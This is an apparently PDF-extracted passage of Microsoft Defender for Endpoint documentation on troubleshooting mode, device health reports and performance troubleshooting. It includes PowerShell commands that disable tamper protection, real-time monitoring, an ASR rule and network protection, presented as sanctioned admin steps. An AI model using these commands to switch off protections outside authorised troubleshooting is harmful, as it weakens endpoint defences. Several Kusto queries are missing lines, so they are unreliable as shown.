to temporarily disable tamper protection on your device and make your necessary
Use troubleshooting mode to disable/change the tamper protection setting to
perform:
Microsoft Defender Antivirus functional troubleshooting /application
compatibility (false positive application blocks).
Local admins, with appropriate permissions, can change configurations on

individual endpoints that are usually locked by policy. Having a device in
troubleshooting mode can be helpful when diagnosing Microsoft Defender
Antivirus performance and compatibility scenarios.
Local admins can't turn off Microsoft Defender Antivirus, or uninstall it.
Local admins can configure all other security settings in the Microsoft Defender
Antivirus suite (for example, cloud protection, tamper protection).
Admins with "Manage Security settings" permissions have access to turn on

troubleshooting mode.
Microsoft Defender for Endpoint collects logs and investigation data throughout
the troubleshooting process.
A snapshot of MpPreference is taken before troubleshooting mode begins.
A second snapshot is taken just before troubleshooting mode expires.
Operational logs from during troubleshooting mode are also collected.
Logs and snapshots are collected and are available for an admin to collect using
the Collect investigation package feature on the device page. Microsoft doesn't
remove this data from the device until an admin has collected it.
Admins can also review the changes in settings that take place during
Troubleshooting mode in Event Viewer on the device page.
Troubleshooting mode automatically turns off after reaching the expiration time (it
lasts for 4 hours). After expiration, all policy-managed configurations become
read-only again and revert back to how the device was configured before enabling
troubleshooting mode.
It could take up to 15 minutes from the time the command is sent from Microsoft
Defender XDR to when it becomes active on the device.
Notifications are sent to the user when troubleshooting mode begins and when
troubleshooting mode ends. A warning is also sent to indicate that
troubleshooting mode is ending soon.
The beginning and ending of troubleshooting mode is identified in the Device
Timeline on the device page.
You can query all troubleshooting mode events in advanced hunting.
７ Note
Policy management changes are applied to the device when it is actively in

troubleshooting mode. However, the changes do not take effect until
troubleshooting mode expires. Additionally, Microsoft Defender Antivirus Platform
updates are not applied during Troubleshooting mode. Platform updates are
applied when troubleshooting mode ends with a Windows update.
Prerequisites
A device running Windows 10 (version 19044.1618 or later), Windows 11, Windows
Server 2019, or Windows Server 2022.
ﾉ Expand table
Semester/Redstone OS version Release
21H2/SV1 >=22000.593 KB5011563: Microsoft Update Catalog
20H1/20H2/21H1 >=19042.1620 KB5011543: Microsoft Update Catalog

>=19041.1620
>=19043.1620
Windows Server 2022 >=20348.617 KB5011558: Microsoft Update Catalog
Windows Server 2019 (RS5) >=17763.2746 KB5011551: Microsoft Update Catalog
Troubleshooting mode is also available for machines running the modern, unified
solution for Windows Server 2012 R2 and Windows Server 2016. Before you use
troubleshooting mode, make sure all of the following components are up to date:
Sense version 10.8049.22439.1084 or later (KB5005292: Microsoft Update

Catalog )
Microsoft Defender Antivirus - Platform: 4.18.2207.7 or later (KB4052623:

Microsoft Update Catalog )
Microsoft Defender Antivirus - Engine: 1.1.19500.2 or later (KB2267602:

Microsoft Update Catalog )
For troubleshooting mode to be applied, Microsoft Defender for Endpoint must be
tenant-enrolled and active on the device.
The device must be actively running Microsoft Defender Antivirus, version

4.18.2203 or later.
Enable troubleshooting mode

1. Go to the Microsoft Defender portal (https://security.microsoft.com ), and sign in.
2. Navigate to the device page/machine page for the device you would like to turn
on troubleshooting mode. Select Turn on troubleshooting mode. You must have
"Manage security settings in Security Center" permissions for Microsoft Defender
for Endpoint.
７ Note
The Turn on troubleshooting mode option is available on all devices, even if the
device does not meet the prerequisites for troubleshooting mode.
3. Confirm you want to turn on troubleshooting mode for the device.


4. The device page shows the device is now in troubleshooting mode.
Advanced hunting queries

Here are some prebuilt advanced hunting queries to give you visibility into the
troubleshooting events that are occurring in your environment. You can also use these
queries to create detection rules to generate alerts when devices are in troubleshooting
mode.
Get troubleshooting events for a particular device

Search by deviceId or deviceName by commenting out the respective lines.
Kusto
//let deviceName = "<deviceName>"; // update with device name

let deviceId = "<deviceID>"; // update with device id
DeviceEvents
| where DeviceId == deviceId
//| where DeviceName == deviceName
| where ActionType == "AntivirusTroubleshootModeEvent"
| extend _tsmodeproperties = parse_json(AdditionalFields)
| project Timestamp,DeviceId, DeviceName, _tsmodeproperties,
_tsmodeproperties.TroubleshootingState,
_tsmodeproperties.TroubleshootingPreviousState,
_tsmodeproperties.TroubleshootingStartTime,
_tsmodeproperties.TroubleshootingStateExpiry,
_tsmodeproperties.TroubleshootingStateRemainingMinutes,
_tsmodeproperties.TroubleshootingStateChangeReason,
_tsmodeproperties.TroubleshootingStateChangeSource
Devices currently in troubleshooting mode

Kusto
DeviceEvents
| where Timestamp > ago(3h) // troubleshooting mode automatically disables
after 4 hours
| where _tsmodeproperties.TroubleshootingStateChangeReason contains
"started"
|summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by
DeviceId
Count of troubleshooting mode instances by device

Kusto
DeviceEvents
| where Timestamp > ago(30d) // choose the date range you want
"started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by
DeviceId
| sort by count_
Total count
Kusto
DeviceEvents
| where Timestamp > ago(2d) //beginning of time range
| where Timestamp < ago(1d) //end of time range
"started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count()
| where count_ > 5 // choose your max # of TS mode instances for
your time range
Related articles
 Tip
processes, and file extensions might be causing performance issues; some
examples are:

top scans per file
Troubleshooting mode scenarios

 Tip
Feedback

Troubleshooting mode scenarios in
Article • 10/26/2023
Applies to:

Microsoft Defender for Endpoint troubleshooting mode allows you to troubleshoot

various Microsoft Defender Antivirus features by enabling them from the device and
testing different scenarios, even if they're controlled by the organization policy. The
troubleshooting mode is disabled by default and requires you to turn it on for a device
(and/or group of devices) for a limited time. This is exclusively an enterprise-only
feature, and requires Microsoft Defender XDR access.
For troubleshooting performance-specific issues related to Microsoft Defender Antivirus,

see: Performance analyzer for Microsoft Defender Antivirus.
 Tip
During troubleshooting mode, you can use the PowerShell command Set-
MPPreference -DisableTamperProtection $true on Windows devices.
To check the state of tamper protection, you can use the Get-
MpComputerStatus PowerShell cmdlet. In the list of results, look for
IsTamperProtected or RealTimeProtectionEnabled . (A value of true means
tamper protection is enabled.)
Scenario 1: Unable to install application

If you want to install an application but receive an error message that Microsoft
Defender Antivirus and tamper protection is on, use the following procedure to
troubleshoot the issue.
1. Request the security admin to turn on troubleshooting mode. You get a Windows
Security notification once the troubleshooting mode starts.
2. Connect to the device (using Terminal Services for example) with local admin
permissions.
3. Start Process Monitor (ProcMon). See the steps described in Troubleshoot

performance issues related to real-time protection.
4. Go to Windows security > Threat & virus protection > Manage settings >
Tamper protection > Off.
Alternately, during troubleshooting mode, you can use the PowerShell command
Set-MPPreference -DisableTamperProtection $true on Windows devices.
To check the state of tamper protection, you can use the Get-MpComputerStatus
PowerShell cmdlet. In the list of results, look for IsTamperProtected or
RealTimeProtectionEnabled . (A value of true means tamper protection is enabled.)
5. Launch an elevated PowerShell command prompt, and toggle off real-time

protection.
Run Get-MpComputerStatus to check the status of real-time protection.

Run Set-MpPreference -DisableRealtimeMonitoring $true to turn off real-
time protection.
Run Get-MpComputerStatus again to verify status.
6. Try installing the application.
Scenario 2: High CPU usage due to Windows

Defender (MsMpEng.exe)
Sometimes during a scheduled scan, MsMpEng.exe can consume high CPU.
1. Go to Task Manager > Details tab to confirm that MsMpEng.exe is the reason
behind the high CPU usage. Also check to see if a scheduled scan is currently
underway.
2. Run Process Monitor (ProcMon) during the CPU spike for around five minutes, and
then review the ProcMon log for clues.
3. When the root cause is determined, turn on troubleshooting mode.
4. Sign into the device, and launch an elevated PowerShell command prompt.
5. Add process/file/folder/extension exclusions based on ProcMon findings using one
of the following commands (the path, extension, and process exclusions
mentioned in this article are examples only):
Set-mppreference -ExclusionPath (for example, C:\DB\DataFiles ) Set-
mppreference –ExclusionExtension (for example, .dbx ) Set-mppreference –
ExclusionProcess (for example, C:\DB\Bin\Convertdb.exe )
6. After adding the exclusion, check to see if the CPU usage has dropped.
For more information on Set-MpPreference cmdlet configuration preferences for

Microsoft Defender Antivirus scans and updates, see Set-MpPreference.
Scenario 3: Application taking longer to

perform an action
When Microsoft Defender Antivirus real-time protection is turned on, applications can
take longer to perform basic tasks. To turn off real-time protection and troubleshoot the
issue, use the following procedure.
1. Request security admin to turn on troubleshooting mode on the device.
2. To disable real-time protection for this scenario, first turn off tamper protection.
You can use the PowerShell command Set-MPPreference -DisableTamperProtection
$true on Windows devices.
To check the state of tamper protection, you can use the Get-MpComputerStatus
PowerShell cmdlet. In the list of results, look for IsTamperProtected or
RealTimeProtectionEnabled . (A value of true means tamper protection is enabled.)
For more information, see Protect security settings with tamper protection.
3. Once tamper protection is disabled, sign into the device.
4. Launch an elevated PowerShell command prompt, and run the following

command:
Set-mppreference -DisableRealtimeMonitoring $true
5. After disabling real-time protection, check to see if the application is slow.

Scenario 4: Microsoft Office plugin blocked by
Attack surface reduction isn't allowing Microsoft Office plugin to work properly because
Block all Office applications from creating child processes is set to block mode.
1. Turn on troubleshooting mode, and sign into the device.

command:
Set-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-

AD5F3C50688A -AttackSurfaceReductionRules_Actions Disabled
3. After disabling the ASR Rule, confirm that the Microsoft Office plugin now works.
For more information, see Overview of attack surface reduction.
Scenario 5: Domain blocked by Network

Protection
Network Protection is blocking Microsoft domain, preventing users from accessing it.
1. Turn on troubleshooting mode, and sign into the device.

command:
Set-MpPreference -EnableNetworkProtection Disabled
3. After disabling Network Protection, check to see if the domain is now allowed.
For more information, see Use network protection to help prevent connections to bad
sites.
See also
Enable troubleshooting mode
Set-MpPreference
Get an overview of Microsoft Defender for Endpoint
 Tip
Feedback

Device health reports in Microsoft
Article • 11/15/2023
Applies to:

The Device Health report provides information about the devices in your organization.
The report includes trending information showing the sensor health state, antivirus
status, OS platforms, Windows 10 versions, and Microsoft Defender Antivirus update
versions.
） Important
For Windows Server 2012 R2 and Windows Server 2016 to appear in device health
reports, these devices must be onboarded using the modern unified solution
package. For more information, see New functionality in the modern unified
solution for Windows Server 2012 R2 and 2016.
In the Microsoft 365 Security dashboard navigation panel, select Reports, and then
open Device health and compliance. The Device health and compliance dashboard is
structured in two tabs:
The Sensor health & OS tab provides general operating system information,
divided into three cards that display the following device attributes:
Sensor health card
Operating systems and platforms card
Windows versions card
The Microsoft Defender Antivirus health tab has eight cards that report on
aspects of Microsoft Defender Antivirus:
Antivirus mode card
Antivirus engine version card
Antivirus security intelligence version card
Antivirus platform version card
Recent antivirus scan results card
Antivirus engine updates card
Security intelligence updates card
Antivirus platform updates card

To access the Device health and antivirus compliance report in the Microsoft 365
Security dashboard, the following permissions are required:
ﾉ Expand table
Permission name Permission type
View Data Threat and vulnerability management (TVM)
To Assign these permissions:

4. Select Edit.
7. In Permissions, select View Data, and under View Data select Threat and
vulnerability management (TVM).
See also
 Tip

top scans per file
Create and manage roles for role-based access control.

Export device antivirus health details API methods and properties
 Tip
Feedback

Device health, Microsoft Defender
Antivirus health report
Article • 02/18/2024
Applies to:

The report includes trending information showing the antivirus status and Microsoft
Defender Antivirus engine, intelligence, and platform versions.
） Important
For devices to appear in Microsoft Defender Antivirus device health reports they
must meet the following pre-requisites:
Device is onboarded to Microsoft Defender for Endpoint

OS: Windows 10, Windows 11, Windows Server 2012 R2/, 2016 R2/ 2019/2022
(non MMA), MacOS, Linux
Sense (MsSense.exe): 10.8210. *+. See Prerequisites section for related details.
open Device health and compliance. The Microsoft Defender Antivirus health tab has
eight cards that report on the following aspects of Microsoft Defender Antivirus:
Antivirus mode card


ﾉ Expand table

4. Select Edit.
Microsoft Defender Antivirus health tab

The Microsoft Defender Antivirus health tab contains eight cards that report on several
aspects of Microsoft Defender Antivirus in your organization:
Two cards, Antivirus mode card and Recent antivirus scan results card, report about
Microsoft Defender Antivirus functions.
The remaining six cards report about the Microsoft Defender Antivirus status for devices
in your organization:
ﾉ Expand table
version cards: update cards{1}
Antivirus engine version card Antivirus engine updates card

Antivirus security intelligence version card Security intelligence updates card
Antivirus platform version card Antivirus platform updates card
The three version cards provide flyout reports that The three up-to-date reporting cards
provide additional information, and enable further provide links to resources to learn
exploration. more.
{1}
For the three updates cards (also known as up-to-date reporting cards), "No data
available" (or "Unknown" value) indicates devices that aren't reporting update status.
Devices that aren't reporting update status can be due to various reasons, such as:
Computer is disconnected from the network.

Computer is powered down or in a hibernation state.
Microsoft Defender Antivirus is disabled.
Device is a non-Windows (Mac or Linux) device.
Cloud protection isn't enabled.
Device doesn't meet pre-requisites for Antivirus engine or platform version.
Prerequisites
Up-to-date reporting generates information for devices that meet the following criteria:
Engine version: 1.1.19300.2+
Platform version: 4.18.2202.1+
Cloud protection enabled
Sense (MsSense.exe): 10.8210. *+
Windows OS - Windows 10 1809 or later
７ Note
* Currently up to date reporting is only available for Windows devices. Cross

platform devices such as Mac and Linux are listed under "No data
available"/Unknown.

Card functionality
The functionality is essentially the same for all cards. By clicking on a numbered bar in
any of the cards, the Microsoft Defender Antivirus details flyout opens enabling you to
review information about all the devices configured with the version number of an
aspect on that card.
If the version number that you clicked on is:
A current version, then Remediation required and Security recommendation

aren't present.
An outdated version, a notification at the top of the report is present, indicating
Remediation required, and a Security recommendation link is present. Select the
security recommendation link to navigate to the threat and vulnerability
management console, which can recommend appropriate antivirus updates.
To add or remove specific types of information on the Microsoft Defender Antivirus
details flyout, select Customize Columns. In Customize Columns, select or clear items
to specify what you want included in the Microsoft Defender Antivirus details report.
New Microsoft Defender Antivirus filter definitions

The following table contains a list of terms that are new to Microsoft Defender Antivirus
reporting.
ﾉ Expand table
Column name Description
Security Indicates Microsoft's release date of the security intelligence update version
intelligence on the device. Devices with a security intelligence publish time greater than
publish time seven days are considered out of date in the reports.
Last seen Indicates date when device last had connection.
Data refresh Indicates when client events were last received for reporting on: AV mode,
timestamp AV engine version, AV platform version, AV security intelligence version, and
scan information.
Signature refresh Indicates when client events were last received for reporting on engine,
time platform, and signature up to date status.
Within the flyout: clicking on the name of the device will redirect you to the "Device
page" for that device, where you can access detailed reports.
Export report
There are two levels of reports that you can export:
Top level export
There are two different export csv functionalities through the portal:
Top level export. You can use the top-level Export button to gather an all-up
Microsoft Defender Antivirus health report (500-K limit).
Flyout level export. You can use the Export button within the flyouts to export a
report to an Excel spreadsheet (100-K limit).
Exported reports capture information based on your entry point into the details report
and which filters or customized columns you have set.
For information on exporting using API, see the following articles:
Export device antivirus health report

） Important
Currently, only the Antivirus Health JSON Response is generally available. Antivirus
Health API via files is only available in public preview.
Advanced Hunting custom query is currently only available in public preview, even
if the queries are visible.
Microsoft Defender Antivirus version and update cards

functionality
Following are descriptions for the six cards that report about the version and update
information for Microsoft Defender Antivirus engine, security intelligence, and platform
components:
Full report
In any of the three version cards, select View full report to display the nine most recent
Microsoft Defender Antivirus version reports for each of the three device types:
Windows, Mac, and Linux; if fewer than nine exist, they're all shown. An Other category
captures recent antivirus engine versions ranking tenth and below, if detected.
A primary benefit of the three version cards is that they provide quick indicators as to
whether the most current versions of the antivirus engines, platforms, and security
intelligence are being utilized. Coupled with the detailed information that is linked to
the card, the versions cards become a powerful tool to check if versions are up to date
and to gather information about individual computers, or groups of computers. Ideally,
when you run these reports, they'll indicate that the most current antivirus versions are
installed, as opposed to older versions. Use these reports to determine whether your
organization is taking full advantage of the most current versions.
To help ensure your anti-malware solution detects the latest threats, get updates
automatically as part of Windows Update.
For more details on the current versions and how to update the different Microsoft
Defender Antivirus components, visit Microsoft Defender Antivirus platform support.
Card descriptions
Following are brief summaries of the collected information reported in each of the
Antivirus version cards:
Antivirus mode card
Reports on how many devices in your organization – on the date indicated on the card –
are in any of the following Microsoft Defender Antivirus modes:
ﾉ Expand table
value mode
0 Active
1 Passive
2 Disabled (uninstalled, disabled, or SideBySidePassive {also known as Low Periodic Scan})
3 Others (Not running, Unknown)
4 EDRBlocked
Following are descriptions for each mode:
Active mode - In active mode, Microsoft Defender Antivirus is used as the primary
antivirus app on the device. Files are scanned, threats are remediated, and
detected threats are listed in your organization's security reports and in your
Passive mode - In passive mode, Microsoft Defender Antivirus isn't used as the
primary antivirus app on the device. Files are scanned, and detected threats are
reported, but threats aren't remediated by Microsoft Defender Antivirus.
IMPORTANT: Microsoft Defender Antivirus can run in passive mode only on
endpoints that are onboarded to Microsoft Defender for Endpoint. See
Requirements for Microsoft Defender Antivirus to run in passive mode.
Disabled mode - synonymous with: uninstalled, disabled, sideBySidePassive, and
Low Periodic Scan. When disabled, Microsoft Defender Antivirus isn't used. Files
aren't scanned, and threats aren't remediated. In general, Microsoft doesn't
recommend disabling or uninstalling Microsoft Defender Antivirus.
Others mode - Not running, Unknown
EDR in Block mode - In endpoint detection and response (EDR) blocked mode. See
Endpoint detection and response in block mode
Devices that are in either passive, LPS, or Off present a potential security risk and should
be investigated.
For details about LPS, see Use limited periodic scanning in Microsoft Defender Antivirus.

This card has two bars graphs showing all-up results for quick scans and full scans. In
both graphs, the first bar indicates the completion rate for scans, and indicate
Completed, Canceled, or Failed. The second bar in each section provides the error
codes for failed scans. By scanning the Mode and Recent scan results columns, you can
quickly identify devices that aren't in active antivirus scan mode, and devices that have
failed or canceled recent antivirus scans. You can return to the report with this
information and gather more details and security recommendations. If any error codes
are reported in this card, there will be a link to learn more about error codes.
For more details on the current Microsoft Defender Antivirus versions and how to
update the different Microsoft Defender Antivirus components, visit Manage Microsoft
Defender Antivirus updates and apply baselines.

Shows the real-time results of the most current Microsoft Defender Antivirus engine
versions installed across Windows Devices, Mac devices, and Linux devices in your
organization. Microsoft Defender Antivirus engine is updated monthly. For more
information on the current versions and how to update the different Microsoft Defender
Antivirus components, see Microsoft Defender Antivirus platform support.
Lists the most common Microsoft Defender Antivirus security intelligence versions
installed on devices on your network. Microsoft continually updates Microsoft Defender
security intelligence to address the latest threats, and to refine detection logic. These
refinements to security intelligence enhance Microsoft Defender Antivirus' (and other
Microsoft anti-malware solutions') ability to accurately identify potential threats. This
security intelligence works directly with cloud-based protection to deliver AI-enhanced,
next-generation protection that is fast and powerful.
Shows the real-time results of the most current Microsoft Defender Antivirus platform
versions installed across versions of Windows, Mac, and Linux devices in your
organization. Microsoft Defender Antivirus platform is updated monthly. For more
information on the current versions and how to update the different Microsoft Defender
Antivirus components, see Microsoft Defender Antivirus platform support
Up-to-date cards
The up-to-date cards show the up-to-date status for Antivirus engine, Antivirus
platform, and Security intelligence update versions. There are three possible states: Up
to date ('True'), out of date ('False'), and no data available ('Unknown').
） Important
The logic used to make up-to-date determinations has recently been enhanced and
simplified. The new behavior is documented in this section.
Definitions for Up to date, out of date, and no data available are provided for each card
below.
Microsoft Defender Antivirus uses the additional criteria of "Signature refresh time" (the
last time device communicated with up to date reports) to make up-to-date reports and
determinations for engine, platform, and security intelligence updates.
The up-to-date status is automatically marked as "unknown" or "no data available" if the
device hasn't communicated with reports for more than seven days (signature refresh
time >7).
For more information about the aforementioned terms, refer back to the section: New
Microsoft Defender Antivirus filter definitions
７ Note
Up to date reporting prerequisites
Up to date reporting generates information for devices that meet the following
criteria:
Engine version: 1.1.19300.2+

Platform version: 4.18.2202.1+
Cloud protection enabled
Windows OS*
*Currently up to date reporting is only available for Windows devices. Cross

platform devices such as Mac and Linux are listed under "no data available"
Up-to-date definitions
Following are up-to-date definitions for engine and platform:
ﾉ Expand table
The engine/platform on Situation

the device is considered:
up to date If the device communicated with the Defender report event

('Signature refresh time') within last seven days, and the Engine or
Platform build version is greater than or equal to ( >= ) the most
recent monthly release version.
out-of-date If the device communicated with the Defender report event

('Signature refresh time') within last seven days, but Engine or
Platform build version is less than ( < ) the most recent monthly
release version.
unknown (no data If the device hasn't communicated with the report event ('Signature
available) refresh time') for more than seven days.
Following is the definitions for up-to-date security intelligence:
ﾉ Expand table
The security intelligence Situation
update is considered:
up to date If the security intelligence version on the device was written in the
past seven days and the device has communicated with the report
event in past seven days.

This card identifies devices that have antivirus engine versions that are up to date versus
out of date.
The general definition of 'up to date' - The engine version on the device is the most
recent engine release. The engine is typically released monthly, via Windows Update
(WU)). There's a three-day grace period given from the day when Windows Update (WU)
is released.
The following table lays out the possible values for up to date reports for Antivirus
Engine. Reported Status is based on the last time reporting event was received
(signature refresh time). If the device hasn't communicated with reports for more than
seven days (signature refresh time >7 days), then the status is automatically marked as
'Unknown' / 'No Data Available'.
ﾉ Expand table
Event's Last Refresh Time (also known as "Signature Refresh Reported Status:
Time" in reports)
< 7 days (new) whatever client reports (Up

to date
Out of date
Unknown)
> 7 days (old) Unknown
For information about Manage Microsoft Defender Antivirus update versions, see
Monthly platform and engine versions.
This card identifies devices that have Antivirus platform versions that are up to date
versus out of date.
The general definition of 'up to date' is that the platform version on the device is the
most recent platform release. Platform is typically released monthly, via Windows
Update (WU). There's a three-day grace period from the day when WU is released.
The following table lays out the possible up to date report values for Antivirus Platform.
Reported values are based on the last time reporting event was received (signature
refresh time). If the device hasn't communicated with reports for more than seven days
(signature refresh time >7 days) then the status is automatically marked as 'Unknown'/
'No Data Available'.
ﾉ Expand table
Event's Last Refresh Time (also known as "Signature Refresh Reported Status
Time" in reports)
< 7 days (new) whatever client reports (Up

to date
Out of date
Unknown)
> 7 days (old) Unknown
For information about Manage Microsoft Defender Antivirus update versions, see
Monthly platform and engine versions.
This card identifies devices that have security intelligence versions that are up to date
versus out of date.
The general definition of 'up to date' is that the security intelligence version on the
device was written in the past 7 days.
The following table lays out the possible up to date report values for Security
Intelligence updates. Reported values are based on the last time reporting event was
received, and the security intelligence publish time. If the device hasn't communicated
with reports for more than seven days (signature refresh time >7 days), then the status
is automatically marked as 'Unknown/ No Data Available'. Otherwise, the determination
is made based on whether the security intelligence publish time is within seven days.
ﾉ Expand table
Event's Last Refresh Time Security Intelligence Publish Reported

(Also known as "Signature Refresh Time" in Time Status
reports)
>7 days (old) >7 days (old) Unknown
<7 days (new) >7 days (old) Out of date
>7 days (old) <7 days (new) Unknown
<7 days (new) <7 days (new) Up to date
See also
 Tip


top scans per file
 Tip
For antivirus-related information for other platforms, see:

 Tip
Feedback

Device health, Sensor health & OS
report
Article • 11/15/2023
Applies to:

The report includes trending information showing the sensor health state, antivirus
status, OS platforms, Windows 10 versions, and Microsoft Defender Antivirus update
versions.
） Important
open Device health and compliance.
The Sensor health & OS tab provides general operating system information,
divided into three cards that display the following device attributes:
Sensor health card

ﾉ Expand table

4. Select Edit.
Sensor health & OS tab

Sensor health and OS cards report on general operating system health, which includes
detection sensor health, up to date versus out-of-date operating systems, and Windows
10 versions.

Each of the three cards on the Sensor health tab has two reporting sections, Current
state and device trends, presented as graphs:
Current state graph

In each card, the Current state (referred to in some documentation as Device summary)
is the top, horizontal bar graph. Current state is a snapshot that shows information
collected about devices in your organization, scoped to the current day. This graph
represents the distribution of devices across your organization that report status or are
detected to be in a specific state.

Device trends graph

The lower graph on each of the three cards isn't named, but is commonly known as
device trends. The device trends graph depicts the collection of devices across your
organization, throughout the time span indicated directly above the graph. By default,
the device trends graph displays device information from the 30-day period, ending in
the latest full day. To gain a better perspective about trends occurring in your
organization, you can fine-tune the reporting period by adjusting the time period
shown. To adjust the time period, open the filter and select a start day and end day.

Filtering data
Use the provided filters to include or exclude devices with certain attributes. You can
select multiple filters to apply from the device attributes. When applied, filters apply to
all three cards in the report.
For example, to show data about Windows 10 devices with Active sensor health state:
1. Under Filters > Sensor health state > Active.

2. Then select OS platforms > Windows 10.
3. Select Apply.
Sensor health card

The Sensor health card displays information about the sensor state on devices. Sensor
health provides an aggregate view of devices that are:
active
inactive
experiencing impaired communications
or where no sensor data is reported
Devices that are either experiencing impaired communications, or devices from which
no sensor data is detected could expose your organization to risks, and warrant
investigation. Likewise, devices that are inactive for extended periods of time could
expose your organization to threats due to out-of-date software. Devices that are
inactive for long periods of time also warrant investigation.
７ Note
In a small percentage of cases, the numbers and distributions reported when

clicking on the horizontal Sensor health bar graph will be out of synch with the
values shown in the Device inventory page. The disparity in values can occur
because the Sensor Health Reports has a different refresh cadence than the Device
Inventory page.

This card shows the distribution of operating systems and platforms that exist within
your organization. OS systems and platforms can give useful insights into whether
devices in your organization are running current or outdated operating systems. When
new operating systems are introduced, security enhancements are frequently included
that improve your organization's posture against security threats.
For example, Secure Boot (introduced in Windows 8) practically eliminated the threat
from some of the most harmful types of malware. Improvements in Windows 10 provide
PC manufacturers the option to prevent users from disabling Secure Boot. Preventing
users from disabling Secure Boot removes almost any chance of malicious rootkits or
other low-level malware from infecting the boot process.
Ideally, the "Current state" graph shows that the number of operating systems is
weighted in favor of more current OS over older versions. Otherwise, the trends graph
indicates that new systems are being adopted and/or older systems are being updated
or replaced.

The Windows 10 versions card shows the distribution of Windows devices and their
versions in your organization. In the same way that an upgrade from Windows 8 to
Windows 10 improves security in your organization, changing from early releases of
Windows to more current versions improves your posture against possible threats.
The Windows version trend graph can help you quickly determine whether your
organization is keeping current by updating to the most recent, most secure versions of
Windows 10.
See also
 Tip


top scans per file
Microsoft Defender Antivirus health
 Tip
Feedback

Troubleshoot performance issues
related to real-time protection
Article • 01/04/2023
Applies to:

Platforms
Windows
If your system is having high CPU usage or performance issues related to the real-time
protection service in Microsoft Defender for Endpoint, you can submit a ticket to
Microsoft support. Follow the steps in Collect Microsoft Defender Antivirus diagnostic
data.
As an admin, you can also troubleshoot these issues on your own.
First, you might want to check if the issue is being caused by another software. Read
Check with vendor for antivirus exclusions.
Otherwise, you can identify which software is related to the identified performance issue
by following the steps in Analyze the Microsoft Protection Log.
You can also provide additional logs to your submission to Microsoft support by
following the steps in:
Capture process logs using Process Monitor

Capture performance logs using Windows Performance Recorder
For performance-specific issues related to Microsoft Defender Antivirus, see:

Check with vendor for antivirus exclusions

If you can readily identify the software affecting system performance, go to the software
vendor's knowledge base or support center. Search if they have recommendations
about antivirus exclusions. If the vendor's website does not have them, you can open a
support ticket with them and ask them to publish one.
We recommend that software vendors follow the various guidelines in Partnering with
the industry to minimize false positives . The vendor can submit their software through
the Microsoft Security Intelligence portal .
Analyze the Microsoft Protection Log

You can find the Microsoft protection log file in C:\ProgramData\Microsoft\Windows
Defender\Support.
In MPLog-xxxxxxxx-xxxxxx.log, you can find the estimated performance impact

information of running software as EstimatedImpact:
Per-process counts:ProcessImageName: smsswd.exe, TotalTime: 6597, Count: 1406,
MaxTime: 609, MaxTimeFile:
\Device\HarddiskVolume3\_SMSTaskSequence\Packages\WQ1008E9\Files\FramePkg.exe,
EstimatedImpact: 65%
ﾉ Expand table
Field name Description
ProcessImageName Process image name
TotalTime The cumulative duration in milliseconds spent in scans of files accessed by

this process
Count The number of scanned files accessed by this process
MaxTime The duration in milliseconds in the longest single scan of a file accessed by
this process
MaxTimeFile The path of the file accessed by this process for which the longest scan of
MaxTime duration was recorded
EstimatedImpact The percentage of time spent in scans for files accessed by this process out
of the period in which this process experienced scan activity
If the performance impact is high, try adding the process to the Path/Process exclusions
by following the steps in Configure and validate exclusions for Microsoft Defender
Antivirus scans.
If the previous step doesn't solve the problem, you can collect more information
through the Process Monitor or the Windows Performance Recorder in the following
sections.
Capture process logs using Process Monitor

Process Monitor (ProcMon) is an advanced monitoring tool that can show real-time
processes. You can use this to capture the performance issue as it is occurring.
1. Download Process Monitor v3.89 to a folder like C:\temp .
2. To remove the file's mark of the web:

a. Right-click ProcessMonitor.zip and select Properties.
b. Under the General tab, look for Security.
c. Check the box beside Unblock.
d. Select Apply.
3. Unzip the file in C:\temp so that the folder path will be C:\temp\ProcessMonitor .
4. Copy ProcMon.exe to the Windows client or Windows server you're
troubleshooting.
5. Before running ProcMon, make sure all other applications not related to the high
CPU usage issue are closed. Doing this will minimize the number of processes to
check.
6. You can launch ProcMon in two ways.
a. Right-click ProcMon.exe and select Run as administrator.
Since logging starts automatically, select the magnifying glass icon to stop the
current capture or use the keyboard shortcut Ctrl+E.
To verify that you have stopped the capture, check if the magnifying glass icon
now appears with a red X.
Next, to clear the earlier capture, select the eraser icon.
Or use the keyboard shortcut Ctrl+X.
b. The second way is to run the command line as admin, then from the Process
Monitor path, run:
Console
Procmon.exe /AcceptEula /Noconnect /Profiling
 Tip
Make the ProcMon window as small as possible when capturing data so

you can easily start and stop the trace.
7. After following one of the procedures in step 6, you'll next see an option to set
filters. Select OK. You can always filter the results after the capture is completed.
8. To start the capture, select the magnifying glass icon again.

9. Reproduce the problem.
 Tip
Wait for the problem to be fully reproduced, then take note of the timestamp
when the trace started.
10. Once you have two to four minutes of process activity during the high CPU usage
condition, stop the capture by selecting the magnifying glass icon.
11. To save the capture with a unique name and with the .pml format, select File then
select Save.... Make sure to select the radio buttons All events and Native Process
Monitor Format (PML).
12. For better tracking, change the default path from

C:\temp\ProcessMonitor\LogFile.PML to
C:\temp\ProcessMonitor\%ComputerName%_LogFile_MMDDYEAR_Repro_of_issue.PML
where:
%ComputerName% is the device name
MMDDYEAR is the month, day, and year

Repro_of_issue is the name of the issue you're trying to reproduce
 Tip
If you have a working system, you might want to get a sample log to
compare.
13. Zip the .pml file and submit it to Microsoft support.
Capture performance logs using Windows

Performance Recorder
You can use Windows Performance Recorder (WPR) to include additional information in
your submission to Microsoft support. WPR is a powerful recording tool that creates
Event Tracing for Windows recordings.
WPR is part of the Windows Assessment and Deployment Kit (Windows ADK) and can
be downloaded from Download and install the Windows ADK. You can also download it
as part of the Windows 10 Software Development Kit at Windows 10 SDK.
You can use the WPR user interface by following the steps in Capture performance logs
using the WPR UI.
Alternatively, you can also use the command-line tool wpr.exe, which is available in
Windows 8 and later versions by following the steps in Capture performance logs using
the WPR CLI.
Capture performance logs using the WPR UI
 Tip
If multiple devices are experiencing this issue, use the one which has the most
RAM.
1. Download and install WPR.
2. Under Windows Kits, right-click Windows Performance Recorder.


Select More. Select Run as administrator.
3. When the User Account Control dialog box appears, select Yes.
4. Next, download the Microsoft Defender for Endpoint analysis profile and save as
MDAV.wprp to a folder like C:\temp .
5. On the WPR dialog box, select More options.


6. Select Add Profiles... and browse to the path of the MDAV.wprp file.
7. After that, you should see a new profile set under Custom measurements named
Microsoft Defender for Endpoint analysis underneath it.
２ Warning
If your Windows Server has 64 GB of RAM or more, use the custom
